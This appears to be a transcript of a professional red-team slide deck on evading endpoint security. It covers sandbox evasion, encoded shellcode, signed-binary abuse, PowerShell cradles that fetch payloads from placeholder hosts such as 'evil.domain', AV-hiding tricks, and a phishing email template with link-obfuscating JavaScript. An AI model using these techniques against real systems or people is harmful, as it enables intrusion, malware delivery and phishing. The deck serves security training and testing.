Endpoint Bypass Charles Hamilton

Transcript

1. 1 © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL

   © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL Bypassing Advanced Security Controls Charles F. Hamilton Senior consultant at Mandiant

2. About me • Charles F. Hamilton, Senior Consultant at Mandiant,

   OSCP, OSCE, GREM • Founder of the RingZer0 Team online CTF since 2014 • 6+ years performing RedTeam/web application/Infrastructure testing for: o Banks, Nuclear, Education o Aerospace, Financial institutions, Insurance companies, Law firms • Enjoy writing low-level language code (Assembly, C) • Publicly published ~10 CVEs, ~100 of them unpublished

3. Summary 0x1 The Reason Behind Evasions and Bypasses 0x2 Bypasses

   & Evasions VS Obfuscation 0x3 Using Custom Executable 0x4 Using Whitelisted Signed Binaries 0x5 The Case of PowerShell 0x6 Endpoint Solutions and Hooks 0x7 Phishing Your Way In 0x8 Targeting the Endpoint Security Product Itself

4. 0x1 The Reason Behind Evasion and Bypasses Mature companies usually

   have several layers of protection to prevent attacks e

5. 0x1 The Reason Behind Evasion and Bypasses • To achieve

   untrusted code execution on a targeted workstation, an attacker has to go through all of these layers • The classic approach used to avoid being detected is to act differently when executed on a security product. Usually by preventing the execution of the malicious payload based on some fingerprinting • An attacker that managed to bypass all of the security layers will be able to execute code on the target system without being detected

6. 0x2 Bypasses & Evasions VS Obfuscation Prioritize bypass and evasion

   over obfuscation Examples: $a = 3; // Original code $a = 1 + 2; // Obfuscated if(context == “sandbox”) { $a = 3; } else { exit() } // Evasion

7. Problem with Sandbox solutions: They are fingerprintable and predictable Differences

   between endpoints (workstations/servers) and sandboxes: • Memory size (endpoint at least 4 Gb) • Disk size (endpoint at least 250 Gb) • Number of CPUs (endpoint at least 2 CPUs) • Processes currently running (if you send the sample by email, is OUTLOOK.exe running) • Network access (does the sandboxes have network access) • Joined to a domain (sandboxes are usually not joined to the corporate domain) • Time zone (Targeting a Canadian company) • Detecting hook (Sandboxes usually hook known APIs functions) • … 0x3 Using Custom Executable

8. 0x3 Using Custom Executable Let's build our malicious payload. In

   this case we are going to rely on Cobalt Strike reverse HTTPS shellcode The following snippet of code will simply run the shellcode as is: There are two major issues: ▪ The shellcode is well-known, most solutions will catch it (network, and on- disk analysis) ▪ The code always attempts to execute the malicious payload

9. 0x3 Using Custom Executable First step is to evade the

   shellcode detection. Simplest way to achieve this goal is to encode it. Classic XOR is usually enough The idea: • Generate a random key (32 bit integer value DWORD) • Use the key to xor each 32 bit chunk of the original shellcode • Create a little assembly decryption stub that brute forces the key • Jump to the decoded version of the shellcode Key 0x2b403db7 0x2b403db7 0x2b403db7 ⊕ ⊕ ⊕ Shellcode 0xfce88600 0x00006089 0xe531d264 = = = Encoded 0xd7a8bbb7 0x2b405d3e 0xce71efd3

10. 0x3 Using Custom Executable Original payload Encoded shellcode + decoder

11. 0x3 Using Custom Executable • Our payload is now AV,

    and IDS/IPS friendly. • To evade live analysis we need to find a way to avoid launching the payload in a sandbox environment. • Check the user domain:

12. 0x3 Using Custom Executable Our final payload now looks like

    is

13. 0x3 Using Custom Executable Pros: ▪ This kind of payload

    will usually pass through pretty much everything except for endpoint protection ▪ Flexible, you can create your own evasion/bypass technique Cons: ▪ Since the endpoint is meeting all the requirements, it will execute the payload the malicious code will be executed and potentially detected ▪ Your payload will be written to the target disk

14. 0x4 Using Whitelisted Signed Binaries • Endpoint solutions rely on

    heuristic detection, pattern matching, behavior, and enforced application whitelisting • The idea behind this approach is using Windows signed binaries that can be used to execute code

15. 0x4 Using Whitelisted Signed Binaries Several Windows binaries have been

    identified as good candidates for command execution: ▪ cdb.exe ▪ installutil.exe ▪ regsvr32.exe ▪ rundll32.exe ▪ msbuild.exe ▪ regasm.exe ▪ … Methods to execute code through all these binaries are well documented.

16. 0x4 Using Whitelisted Signed Binaries • cdb.exe is a Microsoft

    Windows signed binary that can be used to perform applications debugging. The debugger also provides a functionality that can be used to execute arbitrary command echo .shell whoami | cdb.exe C:\windows\system32\ipconfig.exe

17. 0x4 Using Whitelisted Signed Binaries • It is also possible

    to execute shellcode directly using other whitelisted applications regsvr32 /s /u /i:https://c2domain/payload.sct scrobj.dll • This command will run payload.sct, which is a vbscript, and executes the final payload only relying on trusted binaries

18. 0x4 Using Whitelisted Signed Binaries Pros: ▪ Several whitelisting bypasses

    can be chained together to defeat endpoint solutions ▪ For example, executing the binary that we’ve created in the previous section using an application whitelisting bypass will probably pass through all the security layers Cons: ▪ These techniques are well known in the security industry, more advanced endpoint security products now block these known applications even if they are whitelisted ▪ Limited on the kind of payload you can execute ▪ Easy to prevent/block

19. 0x5 The Case of PowerShell PowerShell is basically a built-in

    RAT for hackers and it comes with the following features: ▪ In memory execution ▪ Full scripting engine ▪ Access to .NET language (C#) ▪ Access to Windows API ▪ Trusted Microsoft Windows signed binary

20. 0x5 The Case of PowerShell • PowerShell allows you to

    execute PowerShell scripts in memory without touching the disk • IEX (Invoke-Expression): IEX (New-Object Net.WebClient).DownloadString ("https://evil.domain/payload.ps1"); • Script Block: $cmd = (New-Object Net.WebClient).DownloadString("https://evil.domain/payload.ps1"); ([ScriptBlock]::Create($cmd).Invoke(); • Manual Approach: ▪ Use PowerShell functionalities to get VirtualAlloc function pointer and CreateThread ▪ Copy your shellcode into the memory location ▪ The shellcode can be dynamically downloaded using Net.WebClient DownloadString method ▪ Jump to it using CreateThread and execute the shellcode

21. 21 © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL

    0x5 The Case of PowerShell • Executing code on a remote host without having credentials • Kerberos tickets can be used within PowerShell context PS> module-import .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"

22. 0x6 Endpoint Solutions and Hooks Most of the endpoint solutions

    rely on hooks at different levels: • I/O • Networking • Windows APIs Simply encrypt the payload a second time at the application level Default PowerShell mimikatz.ps1 ⊕ Encrypted using RC4 ⊕ Send over HTTPS ⊕ Windows decrypt the HTTPS stream ⊕ Network hook PowerShell RAT decrypt the RC4

23. 0x6 Endpoint Solutions and Hooks

24. 0x6 Endpoint Solutions and Hooks To defeat on-disk activities is

    quite simple: never write anything on disk PowerShell in-memory can run pretty much everything, including binaries

25. 0x7 Phishing Your Way In Five rules of successful phishing:

    • Don’t put your malicious payload in the email • Don’t allow automated solution to be able to access your final payload • Use categorized domains • Try to fingerprint your victim as much as possible • Use HTTPS with a valid certificate (not self-signed)

26. 0x7 Phishing Your Way In Rule #1: Don’t put your

    malicious payload in the email • Usually sending the phishing email with a link to a server that we control Hi Bob, We are currently updating our code of conduct policy please review and accept as soon as possible. The code of conduct can be found here: https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/ Thank you, Bobby from HR

27. 0x7 Phishing Your Way In Rule #2: Don’t allow automated

    solutions to be able to access your final payload: Let’s assume the HTML on the website looks like this: <a href="https://phishy.domain/payload.docm">download the code of conduct</a> Automated security can easily parse the HTML and find the link to the payload. <a id="download" href="#">download the code of conduct</a> <script> document.getElementById("download").onclick = function() { document.location = "https://phish" + "y.domain/pay" + "load.docm"; }; document.getElementById("download").click(); </script> The click event is now dynamically generated using JavaScript. Most of the automated tools do not interpret the JavaScript and do not follow redirection.

28. 0x7 Phishing Your Way In Rule #3: Use categorized domains:

    • Before the assessment, simply clone a legitimate website and ask the security products to categorize your domain • Hunting for already categorized expired domains can be useful Simple as that ☺

29. 0x7 Phishing Your Way In Rule #4: Try to fingerprint

    your victim as much as possible: • If you can fingerprint the domain used by the targeted company, adding a check similar to the one used for binaries can also save you • Based on the kind of solution they use, sometime a macro will provide better result than HTA or ClickOnce if(context != “sandbox”) { execute you final stage } Rule #5: Use HTTPS with a valid certificate: • Let’s Encrypt can provide you free certificate

30. 0x8 Targeting the Endpoint Security Product Companies use different approaches

    to detect threats: • Blacklisting known malicious binaries • Hash based • Heuristics • …

31. 0x8 Targeting the Endpoint Security Product Certain solutions will blacklist

    known potential malicious files, even if they are Microsoft Signed Binaries • cdb.exe • installutil.exe • regsvr32.exe • rundll32.exe • msbuild.exe • regasm.exe They generally keep track of the binary hash (including old version such as Windows 2000)

32. 0x8 Targeting the Endpoint Security Product Since the detection is

    hash based, changing a single byte will change the hash and defeat it Original: 59bce9f07985f8a4204f4d6554cff708 Modified: 432be6cf7311062633459eef6b242fb5

33. 0x8 Targeting the Endpoint Security Product • Certain file formats

    will be trusted more than others: • Untrusted: ▪ exe ▪ ps1 ▪ vbs ▪ docm, pdf • Generally trusted: ▪ Images (PNG, BMP, JPG) • Delivering shellcode inside valid polyglot images: most security engines will not even bother analyzing images ▪ Tools exist: https://github.com/Mr-Un1k0d3r/DKMC

34. 0x8 Targeting the Endpoint Security Product Using PowerShell without relying

    on powershell.exe Technique one: C:\>copy %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe %temp%\randomname.txt C:\>%temp%\randomname.txt –Exec bypass whoami Technique two: Use .Net (C# in this case) to invoke PowerShell DLLs directly without using powershell.exe at all

35. 0x8 Targeting the Endpoint Security Product using System.Management.Automation; Runspace runspace

    = RunspaceFactory.CreateRunspace(); runspace.Open(); RunspaceInvoke invoke = new RunspaceInvoke(runspace); Pipeline pipe = runspace.CreatePipeline(); pipe.Commands.AddScript("PowerShell script goes here"); pipe.Commands.Add("Out-String"); Collection<PSObject> output = pipe.Invoke();

36. 0x8 Targeting the Endpoint Security Product

37. 37 © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL

    0x9 Tools Search categorized domains https://github.com/Mr-Un1k0d3r/CatMyFish RC4 ThunderShell RAT https://github.com/Mr-Un1k0d3r/ThunderShell Polyglot image to deliver shellcode https://github.com/Mr-Un1k0d3r/DKMC shellcode obfuscator https://github.com/Mr-Un1k0d3r/UniByAv SCT obfuscator (Cobalt Strike, Empire) https://github.com/Mr-Un1k0d3r/SCT- obfuscator PowerShell execution without invoking PowerShell https://github.com/Mr- Un1k0d3r/PowerLessShell Malicious macro generator https://github.com/Mr- Un1k0d3r/MaliciousMacroGenerator Remote WMI execute script https://github.com/Mr- Un1k0d3r/RedTeamPowershellScripts/blob/master/scripts/Remote- WmiExecute.ps1

38. 38 © Mandiant, a FireEye Company. All rights reserved. CONFIDENTIAL

    EOF Questions? Thank you